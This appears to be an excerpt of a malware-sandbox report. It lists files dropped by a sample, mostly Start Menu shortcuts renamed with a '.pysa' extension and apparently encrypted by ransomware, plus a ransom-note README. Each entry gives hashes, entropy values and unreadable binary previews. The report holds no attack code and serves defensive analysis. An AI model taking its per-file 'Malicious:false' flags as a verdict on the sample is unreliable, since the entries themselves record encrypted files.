                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0628169853026215
                  Encrypted:false
                  SSDEEP:48:kuLHmTvqWyBmnXSIgkIOjIHWBGSpfIXmH899ophk7X2F0jr2qPA2GlBt:bTmGWyggkI92BGZ2H8Dofypjr2qelBt
                  MD5:830DB005C670B11F723238F741ED917D
                  SHA1:661E97611470D69E8E66AEA63020458B485704E6
                  SHA-256:3D25E66C2C5A5DE47FDE224E24A9357E762E4BF9C29ED9166F3C90BC4DFE2684
                  SHA-512:5544ACE8B70D5AF85A8406F552ABAB0EFB11035316D7BCD7A519DB4F4AA70AA6DBCA7AF5BB206EA1D5262C77C227D391FA768B994AFDA1F2EF552F2CA7C091FA
                  Malicious:false
                  Preview: ...Q...w..b..?..uf$......?T...?.......~j.Xj..xt.M..&T..&..EF...........F.z..e"Z.b.,.H..K.I..............m.h.N*./.K.r..1c....I..k.-.Y._J.x..?S6W...W...6...CY....N.f......BY"..n5}...m...7....&..n.+.....u.D........|..G.a....~.&=c..$6...q....0.z.V=..._D..g..D.+...G$.f..:....t.._.._=X.....j/nd.....n.t...t...@&.Z.3.V.4L...{...#5@....8...3...p....&...5..Z.9'b.%..$R.c...,....,.iiR.w.^..L}S..SA..1..gs...r.|..6Z.9.H....XTG&.+...|....9.H8Z[..5x;.KK.y.|{.).?.2H...z...h..:y)7.....)..X...G.A9.&.-......&..!1......;..oL.d..K7P....a...C........ .-..'...x...D.c..J}s.;\\[.~/......&..4..`..-.G..qx..wg:|wA...}s.....:..c.dH........C....h.Hy.>.c...q....'d..4..F7...]M.F".. z5q....vz.M-|.q-..;..-.......b#.].....A....O..(k.p.....-...x....N.w5+G.%v..B.Z)....o....K.H.=..}..8. 2h......]....q..jnh*..[../...:.!....,-..nZ..}....n.1a...hR.TG.vb.>z..6.w.|.7Gr.{.LWFgJ..s............i...w: ....<@..[.xLGj...z.U.q.JhZ.iH.J:....%..h..J....1..B..d.e;0.......m...x#2.oV.6..a4n.....
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.080175449675264
                  Encrypted:false
                  SSDEEP:48:CB7NzIKR++s+moHiz4il1KAJ/vKRnksD9oFgSX59YWtZabVbGMvqar9Bi48VMEFU:Ck7wHiz1eAJnKecgXp9XabVliWS48qEu
                  MD5:33A032902358E491AD31D607047A4F94
                  SHA1:4C63F11056B5ED3DA77C71321150496707DFFF73
                  SHA-256:2641F437DB29429B7436E43D4969175D2351F74BD79428B5999F5479BBB70130
                  SHA-512:A57D05DADDBC82EE46FD69CA73F597843D1A806458DDCE4F003145CBCD4E740773CD57F9168335259284791CB7CA232D8850C5AFC31D3FC75D33E91F43DE9216
                  Malicious:false
                  Preview: ZAx.n...h...S.h[.1..~:$A.m..E...Q......@1...2_].o.q.....)./.......M..q....D........\.8.b......x..jF..v...WiRX...6....'........y.G*t;. E..3...gia..-....$..t.>~..k....|&...*....m....V..p..Z...(.A3y...M...'..&...t~l>.O........o...cFv-......Y.o..o#.,;c...z..z.S.7Oz.z.h...)...{..9...*.I.OUy.O...........k;.s.%4.RV..|.a 1c..m..I......g...<..<..G;h.`...z$.*....e..KeV..!.....$.z.e..{.C...A..6.[...F......X.R...m'(.$..d.^>I_..E...q..t.g%.i..,....RE.....Ye...p.v..g.T&e....<.j.C.`..FK....X..TJ....O.Dz..W..?......H.....s{..>...FT..._f..H..T.f0..._Z~c...iT.v......._.......X...(.=...?....RqB...EY7........M<u..w..j.....t2Wi..q...^...2Iq....y.......b.....%..u..[..p....0..a1.6..k.8..x.hb.ef[qo..af.G"=.l...[....#..g.`.i.wp.... .x?.....)u..'.P...;.SVh......IG.".>..!..l...ef...u..h.....e.;..p.4......#.@'..QN.<./......(..B<.T..L.f&.'W;..u...E..'._...%1.F.......w..\.w..F...I..p..VY..%..FL..T..6B.y`,..q.......4Od....E.@....}A.....Y....}d...<..V..N.d...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.02088649595201
                  Encrypted:false
                  SSDEEP:48:hoHf9XLStReECRDsPMvvajcteuurX1YkFZxVe/egnc/nMaiYzXoA4Hydcln:W1XLStPcSken5BTVD/nMDYzN4ln
                  MD5:C43C6F6D596099F8F3EDAB5BC2BF2BB1
                  SHA1:59844CFBBCF2A8DC02B5BBE920B5E23D1C202DB0
                  SHA-256:2DBF7C9C828ECACB27731901D2370893EF3325496FABD222ACC19CE5DDE6C02B
                  SHA-512:FD0AAA2EB90776BCEB0D537BAF3328A89670D8255B824313A638B198F3499377F7A84B4E958D70C9E1F14B8604287E09D4F73CCFBC09058A233F1C5E499EEEAB
                  Malicious:false
                  Preview: ..?..y.[Q...SU...W..m..'..p.S.r.T...'i...-.?z.B.&e....6U.......pC.Yc...4*@....q.f.M!..^F `...(...3..[.Xp..T.WS:.L.2........:@WbNnC..5.Y.k,...)b..#n.h........M...H.....#...)...@Io.]..|...Z.?.qw.A....Or2..p..!/.v......c...L.j.D..4=5$.:..=.^F....*..3DX......3E.Q.8c.6..t..*..6J3Az[.j....i..;...X....w...P7/......&.H..).[.h..L.E(.bm.+.L.......~b.... .=L7.....)..8e.>... .%....D.i.]Y..sFI.....e.g..0;!M!......oWS....,...~.l.S..P.1(N.t.j-;.oj[.. ......B..XlA.7..H..*.......M=...d......FU...[.p.J.WJG.>...mc~EmA.,1..u.S....Y.Q4.63.a.e&..g.4`.A.....`Y~8...M..y......\..l...y...Q........DDD....m.?..iM.X.fK....e.....n.%..EbF=~.S... ...!..(y.....y....c..^......nuX ._r.Y.N.-..-./...i./.......V.9mL00......i.P\."..~H.&!y@......E..)5J...Jww;h..b..5#...-J.+.k.&i.V.7.....3.zi.....{.2.2..IWpP|....)._.G|)........|....9Jn.~)...-N..B.Z....X......;.MH'....M...33E.{......F./_.W.......S.E*K.{u?..2....G.6......^3..........{.^p...p..G.;9.C.S,..z>r.R.....L2di.D..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.766793064138911
                  Encrypted:false
                  SSDEEP:96:LGeL0wVu2MJSafF9YvzAloj55nsfhTUT6UmgtBc/a0y5fEg72/Tg53n64B3pv5ZQ:6egwA6afTYc6jbstUT6U4/a35fZCZc3G
                  MD5:E05B05AA5732BE4F38EA22A939955595
                  SHA1:ACF1D1142BFB4C79796D567ABD9022942E538FB0
                  SHA-256:AAE3A86E3201D4D88F0B59FB96C285B094B50E11EC460AC2E675AD4EAE0ADE21
                  SHA-512:F3DC41AA8A52F50AC702D71AC6B5C1DAD69CA7F14A18DC9801BC5A82C4AB381B0BF4871AF5E82B158292FB59B48EA743CF78E1C5553064CA47897F20E1D7ADBF
                  Malicious:false
                  Preview: .C;.!J........$mL..fa...._.}...1...vg.........M.........]....K\.R.$....$.._y..d..<B.y.....^>..i,!.....)...T..&..yn..Ss.D7y.p...YWM.i.n..0.8..'..Z....WC......e.....x....U.G[O....s.!|=}x_+74......v.....vA.f...E..8.z.R....V...x.;.9v.a.D.....25...z......jw>E.~.r.w/V.....of...1..N....Q...6........Ie.GZ.6E.}'..&..6P.ES......_e690iu..l"<...&6.y.@..".....^.N.........n.Z.47.:..Y.s.....u...M...^1....@..1..l....'RA...... ...y.d.....#.U}..mN.E..(..x..J4..u.R....... y..M.JS.kP. .,..g.q/..|.G.u.h..{.b..o2..L.9..G].8..}`dP3..M'.....?._:.|..s......-.E.E...4.4.3^.Vg.0yo..In.iy_.Cs..f...g.A.Z3.3x+Eu.O.n?k.....l..P8....9.....'b]..`..*.......2.<....g.Y....l.7..@>\I'..{.....94....Y1.6...Zp0.[.:..~.C.E.d....":.^.Br....5......n.&........N..c6..]....(..<.......u.....(.MZ..rbC..{.*....UAt.. ..a.(.n..2=....yR.Y.......1....=k-.r.k^...6...gj..b..U.M..NYR'c.C..............z..j.Q........B..5..Gh-..m....*...#.."8...X.!...7...<....~..?.<vvK.5..e..........fl..<..1.
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.055475661404412
                  Encrypted:false
                  SSDEEP:48:yWRl2sX/YPaV1GmLsAn5uK7K+l9MVbzsNmPpg26X2k0Q83fg+l0F1UXAmJ:p/YPeGmLZ5uKhqbimPuXcQSJ0sX
                  MD5:A039961F0108452A9EF8A678B4007BEC
                  SHA1:A125C4546B1F56A0AC08C4751375F057430C6DA2
                  SHA-256:24059D81B7B52FFA2EA88621B75AC52C6F5592070A87DF82B271AFCBC39E92A0
                  SHA-512:FDFA8D5342B953F0DA77E3E0069CCBED1759C4C6B7C746EED6B8D2F8E449254565BDBD16BF7FFF59F0779AF80AA2FBF2B3A6C1DC52DB2EE45DFE30BC15EED04A
                  Malicious:false
                  Preview: 5...K....I....9[.bn+....G.......G.M....h....U.....n.kn.{30o.cS,..8.@.O`...o.o..v....<....8.......V1..$.*.............b..4..k...(.p#C.o.7..Z..g...T.r...U\|...`.w.#.0...{?.W}^.A{...E.4.^.y..+..R`...i!....Z..&.X b..$k..}2-x7T.....}N(..Rx..Y6...........D...z"...!.(4?eS.v....,^0..9...Xv.-...d...#j..D...4+@;^M...S....q...IS.`.d.-...UB.8&.....&pG)....E...N1'Y.....~..k.Y...../.=..w.<...4...W.,...I..@......;.m..'...!y.0n.....$q.f......ar........Hj..j.1.#r....t..:....I.[v(.P.P..8z..c.~.a.x[.V.~)...>V...~.....;W)t...ju.H.Fg.....0.g{.{...D.2^.QSW..n........CV..d;.P.{..3[2:....J...m.]..803..&_9........QzuW.?V..~j.Nf......X./.^..;..P.c..('.x.........&..a..../..V'.d...3V...^.B.,Y]`..id"^Z.4.#..Q..CV^.......=...<..cRRxp.h.........V.........@.T?].SFx........E.D...WXP.b!..~...iJ.r2<....?.O....w....S...!...R.....h.0..o0...'M.Fo..s.=.^[".|......EQ..,.]W.{.,..&W....|......?O.2.*yN..6...9#Rx.....e..(.c..g.+r.....7V.VWw....<..b..c.....cg,.8.......3
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.04194506732703
                  Encrypted:false
                  SSDEEP:48:zloMBCi1kBSlButUcfOlt35F3ONEy2vpR2XbJ/wINGPRsL0egt2fcY9iEnlO0CnN:zWi1otpfOltXOT2H2XbKW90/KvoxC0
                  MD5:C2CFF32F18F9B5533720A602F322E636
                  SHA1:E89C61054A6EB65189AB1133C0F6F45D31C00EFD
                  SHA-256:93550F895BD4137B832C6A39FEB75BE7197C59DAA7DEC70713EDFED6689BEDA6
                  SHA-512:34DE71C6E36DA6D756AFCBAF329B799D19C8EC4105A83B50A5B15B4C09DB7D475B18AADEA71F088F41521670DBFB132B2437E591AE8526C2B7A7E166B706DE83
                  Malicious:false
                  Preview: |.:...gX,.Rb..n..h.1$.....-G.s..%e...G'I.:D?...t.....c....|Z.D..#.rUI.J......%..0..]..`.;.,..g.].o.("......*0...G..+..7....|d.jx...M.#..G.^.|U.....v6.1..E....-.l.qh..8.$.....6..Q...&S`...XBMV.-H..I$F..=.M.w..J|...7.1..}]A.C...RV..{.o#.........^.=.R..:i....L...a...W..h....J..*~H..1..i>..T;..Z0....&....i&...?.V..E.R^9.4t.... D......ie&4<:..g....rU.O...B(.2...}[v3.M..XM.[..b.>N5.OK.<.....=F..F.. .+..^C1_....^6eex.J9.u..9..1x............K&.F...N....@..j.M...P".f......."]B./.[?G..v.`5g..{.q...u..Fj$._....*..b)|.tv..lFW...f....j...07..7.!.(.9.......J... g.._...%y..Ep........30z:`[.......K..`...w'.59..KR~;......(....b.=..6....|$<S/k...z3...I.1.....Q....h...._.=...Q....j.a.j.>fxZ_.&.'.0.n..9^...R[&...z.f..i..@..Vy....$.%R...,.9...8.t...$.t,.......,...Gn....d.YT....w#eY.Ec.3{.....z..h.Y.f.9.e.|...+Q.......5.k..?.>.'CtH.....P&U...U.#y.f..z....1.R.?.=..N...4.k....'.i9.cNja...y..o...T.N.0.D6.+.....S.....;....m}7{=.[.5@},......l|.K~...q..w.O..T
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Disk Cleanup.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.036271750306636
                  Encrypted:false
                  SSDEEP:48:v5SHnu4hIMqFFR//aUOxZVgy2fIYjQpHWxNr1w8f1c8MvxTfB0kHZPGcGOIdPeX7:v5J4hlqp/a12f8cfrtf1c8KfJHZnGbPM
                  MD5:9F5A9A37E44A0664B824B830499BCCAD
                  SHA1:9B5EACBB108802C556179E1A3021AC8F7F3A65F5
                  SHA-256:8E4013AF4CA27596BD3E48E64479A8A2F04D1AA5814471252FE34F9B76F40A88
                  SHA-512:381B05791CB8CDD9C61602FFD8E46FA614F952E830E907ECD2DEE3D69B49EA78CD58C59C611EA7F06FAA583FFDEA8C3A903F853B30602A79079360E73BF5A8D7
                  Malicious:false
                  Preview: 9.".gXG..2.K<. .. .9...Z=.C'..eF.{.NK%...K..N.....k.a..%..M6;@.....x.G..~2|.~.k8.[4.3V..7I.. ....o; \(..e.W|..%IIf..O...c..,..H.....M..z..O..]......A.M...CI...M.....2...&.N.\A.Wk5.[...7...c.^+..D.Y...i..b#..4{.......M~...........(w.r..........7...|.RIBv..]+.|kcs...s..*0./.K..|*...l6H........+ ...o..[+X..0.]....F....@..s:/...@G........P*s.g...<..._!...7......M.CM]e....O:.fo....oDS@.B@.....P.4....@...y1....7C...0...X(MZ.D9.....h..N*+D.....w.._..0.{.i.K..5...I.L[no..}.|.'..tz...C?...X.......o..Q.3$..h...H2..j....g.z,39Wl'i..<b.......k.J...J.h........]}.x.'.F...G.8M+.^......1..'4.l+.p..A....S.2~...>....o..t...QViN.%.+.:......~,..#.`.4.......WP..........g;...e......h+O..5.)..X.vQ.uM.i~..r..G.N.H...v8...B...2m....C.....~.G{.V...E......4....S\.V..].v.m..o..Nv@E..W..qTRI.U..d.9....!+.....C......d:...(.....S.,.ud..(J....B.H}....{...........e.]$.......M.5F*:H{.....R.g..@/.....wDaHg`..l..`._y.Kl..r.~A].9H..[...?ew..i 1....@>2..pS...%L#489...a.^.
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.067674545730818
                  Encrypted:false
                  SSDEEP:48:JRUOcH9e8UZMf+DcCpvxihd1FxrJeUrzTRi6pLVePZpzwK6+ANlvBtKw2UZBU7:JRjcH9e3lwKUTRZkHzE+g/tK0A
                  MD5:1FEC9B6B9E04354C597B9F66B68ADFC9
                  SHA1:21078F69E200FE8C61E3D04D83A23857EBD65C3A
                  SHA-256:427DD2E293CB797BE529C7F534CD8A89CE468774D47223B8AC3A56DE0BA63E36
                  SHA-512:A00B51C034848450313A56C4CE15FDA2EA67F887B08B851C6BF59225F4B50FFDD2480D25465608FAE3FBFB460013BE5507CAE43495E2D88D6CEC135C763B1651
                  Malicious:false
                  Preview: .U.m:h.w;...l.yW.T......P|..w...6,...g.$G..UQ.....1....^.....L&r......E7[..!x/.L.:....U..WL8.r.*......tS.QqX-.......u.....<.e1...wL....A..p.k.V.....4kp..:.6._jM..k%.6l..YGq+.y......%......^.kv......,...@J.h \..L..~.Td.L..i..r.;.ow7..E...q9.... ).]....r..-T~...y.!.....(.n@`/\....n......ud.J.*.....b.{{....j,b...u."..\..E..G...9...I.*K_..I"]..`{.#.WWc..6.q.\}F.wN.=k.....H..?u.Vl...\....x3.9......4.q....v..l.&4e..gU(......F..{......\T:...+?y...>..{.......sDN.o.D..V..g........?.............P.....e0.;..N....K...../...uX....W.=.$..h..I...u......s.8....-).}...).R...=.Q:.{.Wz#gmx.)...bl.)..-@S=..Kd.....<w..w.x.....t.......W..R..?.L..a.X.. ..i..N\...|...)B.<:.&.Pg..qU..Ck..).<.%..k.%..][.@..u...n4....[i..s.@..h.;b.a.c/.a...7..."...v..&.BS.F..M..liV*...q7..h...sO...m.g......CW.`....7..2.>.] @.Ch.B....K..<...S7.cX?Mi2.m2.....u.6....S../......#r.<o..(Yy8-...wxYb.u0..nT.#.x.N5.. ...0fM,x7.n.L.=.).=.."*^........|[.$.....n.g....zU}.5.1....^.s.3.+/... XC.......
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.040031559318252
                  Encrypted:false
                  SSDEEP:48:wAvOWKY8TPxbx8vgUPd4riHPdSiOl6wC/BuPjK9z5WBXjbhupZYGFUm8OJuAT9:wRtPVx8vfPOriciOl6wCEKYBTRGFUm8g
                  MD5:4E8E822014AC804C9D6AD81525564657
                  SHA1:FE8DD9AA4A9646F23EE1FCEB74F5F18CDFCC6215
                  SHA-256:04CC3CF84009F48B6544FAE0C88E138F25397D4D63EB4B650D8147F1FA961172
                  SHA-512:7A01178C0365194F2E5CC32E50BEF4C93624DB79301ADA7BAB2EE4B90B04DD1EA41F45BDFF9E0679D22360F119E5CCDF959FCAB052BB80D4F315D022C86AD64D
                  Malicious:false
                  Preview: ............9&..+C4.F.I...Do..UcJ/..Wu\..m..ES..%c...".i..w..>...%.Tpc..2.....d...J.WX.u!~Qs.]4.$EP8...tmy.).V./_.....|.U..HM....)........d.'.../U5...^.]......N..~.X..D..;..V3.+.....S.Nk;..yb.."p.m(..h.....^=...b.,.#.9n.....a...fN..mQ.V............,.".F...+".5...U..6.+.O...'2..6.t.j.2.......G.....o..Fm..dH....2...>....,,.SP.1...gB..+m[..+qa..m..(..*.r.0.`9.8...E3...3<f.....u...Vl.m.P6mN5......#$.%"..n.....M.oP..N..bIA...>+...Vw@.9.......|..........3b..7.R?.1\..'.]Ig.2.6.#:..0....T.@..]...U\.v.`.0.#.m.!D...T..i....v.M;.04...JeR.....{p..L..[Jj!....!...$...o..iU.@.........L....B.....do....(.?.4.,vU..J......F..S..4.z~L`..:..[..P..jX./@!_..].j.....Bt......U3.WM ...m....v.m...1Y.....{.9...../.^...=......f.xw@..P.y0......)jg...DL..'Lcu}]6F..=..g.Z.2..!....4._.....G-....>..*2.r.`R......-..^IE..>'~..f.. k .".-.E. +.E2..bO{*~-....k...4...MJ.x..4.Ib-....-..q.T2$ =Sy...|6.I. 9.D.........`......._..l.}k.....$=b.8dHk..AYY.L.....&.?.......s1}l.T.
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (32-bit).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0353014210486355
                  Encrypted:false
                  SSDEEP:48:RocwLCDUqAisO0IN5hBPIaIcVARF3v7xFgONebA1caeQAtb7FyRzOd7Gj7GPOfU2:82DU1MWsVMFf7xO5aeQAZQhU7/q9aW6q
                  MD5:0B1FAA59F8A1989F88BE9211BEADD167
                  SHA1:EA565EE4FBE591083F44204D99B7A935F35C95F9
                  SHA-256:DC2F6360DF39D2776B75689C6AA442B6DFC4C2251EF50608EDCAFB545D3BBB83
                  SHA-512:50F940F7F82C5FFD6397C468E4F8D7FFBD31D8F491E13464C20644EB6F4F642F16D30958676558C2FD24CDA8A1ACE04F8F1D0306ACDECEDF0A44CCB25073E331
                  Malicious:false
                  Preview: ..;~..-.?A...b........w.`....i...<.5X...1\@a..A..&.N.WY.l:.. ...e.....;D.I.7.~.{...E....L.,.mG.^K..TYUvM.9.7...tI.H.Dz9...8M6.V.k.[.k..'.U.....^a..eF.[.o..m..>..J...L.D..b.Yc.8Xw.....0{.Ya[.....>M.. xQ......i.l.:p.H.....{.VT ..f...n...x..0.\....dP.......S...3.......D>.....f.....T..o..Ry..S..`.O..Q...7L-...8....\...ORo..l..@......w..|.."?Q.....{2..*6q..?N.r...x.~T..a..h..{.19hn..r."..-......KC.l...N.w{T...m........`..S.8.jS..Qc.J..../13.".E..~8d?.u{RoB..-.(V.q..*.b.rWyW#;6y.?^U.?Yk.Q.zA..0.-v.dY.....d1.)~.w....g.I.o..bk...-.w..,$...3.....y....7..:.D.@'.t.B.l`.0.h....D.z.?......).4.k=.R......R.........!h..;.Bu......2.....f..........t..Oo2o..t..u.X)=N....$V.'\...*.1h9e.2.QM.m.J.K..w`..%?.6..V..."Fk......... ..]...?.$.x.~...9....c-4.z.......R..8..d.......d.A..X.D......4Z....^.....IC[.k..5.}.w....I(.8..A.Pdj.NI-.^aO..gXZ..!)....C.l......N.W.~..?B1......B'..Gl.i.J..vxM.aE(...9;`......z...JPOK/E.`.(h?..h..iP.I.....1Xf'....ZU.%Kz.#9)./..i.....\
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (64-bit).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.047140531091981
                  Encrypted:false
                  SSDEEP:48:Zy7yCDeXBjYR8NdamCVtu1pfYbjwVILwJZkV3Dq0i0sTZn6OBGYr5qRfw1IZv0Ve:ZkeXhLNdtCVtu1VreLcqV3DqYSZ6Cr5q
                  MD5:DE73E596EAE5DC794B0A4F5250E52334
                  SHA1:CE85A897C976F6A8E80D40BBF7E5911FA298BCF9
                  SHA-256:139B61DC2EA8F7CCF3200E31A6ADF92E19F004A55C7516E084EB03D16C5A8CF3
                  SHA-512:07BFDC2BF5E2E05D0F09DA9AFE7E92E16B299F0254AD489C96DF97494242539FEB15E8C05227020AC7F0241147C2457D0B7D860A1F1F8596F0353BD4A5A6A4B2
                  Malicious:false
                  Preview: .5J%../...w....{H."c ..AO2..'VIPV...=L..;.ufyP.F.e..\5.-...g8ef......<pw..|...s.c.......n.=ub{d..../........q....=._e.^H.=..(..bJ.W..q.P..6.D...#.<.*.M......_...@.u...........@D...l`.v.8..r..{-7.....@..=?.BK....Q.hV..Dx#..q.;cY-.!18.....m.Gm.<../..C^.C..H.9...+...)..z.'pIQ.Q ...Q...M./V..,._+...+azf0..-M...0...r..5...-..H.,,#NT..ce..;....z.,#../...8B...R..BEu.~1.n..7...V_.d...%.4.v....h.M.yHo..ul.._../.9V......\.7u.:F.Iy. .lz........c).D.O...J......4d....?6A..k...>Og.S.R.....1I...b.7......HWm..p.|...........<W....URP.KV..#.xGw.. ..'.K..N..}..M.J..yad.q.3e....Qg..G....k..G.Ic.;H.}w2.(.Q.Y/...E...|...TT..n.&k....z^.<.Q..Y..2.4.w?=].6.i.j('..rH...f..Y'X.../W.}.v.7.+......T...I.5:......&W.P...9...y......0.q...<.....,. l&[H.&.F.K*...@X.......0....{..K...w...(uUL.U...JG5.%H.@..s'..&.c..x...K....~4.....s..FJh..g....!7...g......x....+..F.=....X ......kq.a..rt-^. ..9..cnE.....k96.@M...Y2....h~*wl...P#.6.."..r.k.yD.3A.$''-..S......m[A[k...a..91...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.087062358931338
                  Encrypted:false
                  SSDEEP:48:yfLCQVun4MA09GZpXhYPn/tSHY3VLW/0XgCLV3OP5a2vOA/uOO3+pUi:4UphcXAIaJNN5cFvBuOO+Ui
                  MD5:05896C65E658C95F2D701DCBC4A5C344
                  SHA1:37853CED32C0737E6B70F83CBC70DD256F31A4A9
                  SHA-256:B20826C1AAAA64533692CC39A187AB20F0459E97FCBE8B54FBABDCA8849F4509
                  SHA-512:C3EC1D18C29C5E43DA2D9324697A94D5D73F3B3C23BB952D2423C09560946CEF13300E199A79BF1FFE672036C3AD152D7ADF317B0AE5CE9B308B454E26ECA938
                  Malicious:false
                  Preview: .#b+.].c.[.V.R}LN.+.z..........8..... U...u.|n..?....7...x.._.CA.o.x.t...M.......qz...7.@i....L......=.dnp..Lr.V..=.Y1.^~l]....c...s...{T?..|D......Fs. *.Ty.y.UJ..j.Q..;.0......*.....M.,K9....d5...L%5.=f.....7..NP....4...... .Zz=...r.M....\f...P.J\.G..V87'j.T..s......`V<+}.f...,.^sa0.|*nO.@gD..w..!P...Vm.qhE..h..8..#.]3.A.Um.5.p....+...1"...Ojl-QY..'=).,........>..]..2..w%...Uh.{.H......~........(.o........\\Hd{..v..k.G...6.XNc%+,..I..K..).....k.%s........C.3..X.cl./O-q.a...*F..#Q.....*.SYu..2....<.....%.|z+...I..u...`i.......G.,.........k.p.}.'.F.:X...h.\.-.~..[?..B..^_.....;u..`..daQp..F.)..:.B0....u...........la...j....)W.b?=....#..:W./.P..n...W-T).}..B}.+V.*.u&.V.u.w..b.wr........L4..u.q..P..G>h.cz<....{...T.p.QM.0m^y....o.._.~...........s/.O.H...,..Il..S..`i.@..hy....eX....<...>U...!u{.1...V...T....y3. ......y....r..:.....+/..VT.K....-.$..C...,....K..+yt.~...m..n.8w$..6C.K./.Z%M..*y....9oQ.*.....y..._n.....g.f4........M.4Q
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Print Management.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.022122671994594
                  Encrypted:false
                  SSDEEP:48:AzS2gwWb6yXvFjA9JvKhnzpdQBhvkF+GZkmTBb31grwCjJVOKWfoNWkf6apMDQNF:AzjgwWR/aABzpWX88GZk61grwCj1WQNJ
                  MD5:F3872215A6956B3C7E4B379EE965AE7F
                  SHA1:1B90AD1CFEAD23D481CE3BC56B9E6839B5850C7D
                  SHA-256:E3A68409D10CE3BEFFCF2BA81B0FB64D2FE0FBCC21C5828F392F8EFD430EDF0B
                  SHA-512:9525996630EB3234786FE4D4D1728904E009A093C46F6B8961E985406C184ADE94F575799501D06DD88B1568742A1CAE4339344C090ABA8E4B04E0AD3DD55FBC
                  Malicious:false
                  Preview: ...hR.....g.|0(`)r.@......T..H..<......D2...."L.l.5....b.l[.a .}.@f....u.e....q..\.. .4#G>$&7.Is...`cu.....?....`.A....!..l....._....^6.....q.5.2.......DN.Lz4.y...C.O.sv.K..R.q.GW.YMh..".I..r....l&O...N#D..0..QP.......(..L".Y......X9../M.9F.T.?A...m..DtK(uZ.J.X.HZ1...$..p\.....3..|.k.sAD.r.$!6..2Q4.....)}.lZ..$........t.I.h..v...{.OZ08....%.Ry..S.$.....,x.T.B.H...Q.!..>.........D.'{.\.J...19a.....r..y.{]....l_.\..2&......q'.t...1.m.{...5........|D..<hV.+H.....m`...k.MsA.9..1.o....2`.JI.&/..Q....D...On.~d.<.4...J....Z=..f.h..13....6z..8..z"..._...`.4.............^..js.,...r{.B...PD..d...K{%u#*..].4^..=.m....~.2.'..q...a..R..K.7..".P...>x3..rv..]3..3.G.{..s..S.H..a`.y7./....@h...'p$...=........2.....-{a.W.D.Z.Y9.*.....G.7;.0...d,..........j~dZ..C..r..0.`..sD..j,...'.M..q@P..B...@;...E...hO.*~..j....4.C.b.9..%.@P.R*A^.......Df......w..0..!..K.......QA.rl9..}+..|.6...>...A..t..y.A.....CI^.r.lI..>&.bp...A.\.[...v.L..........@.p...0......^?
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
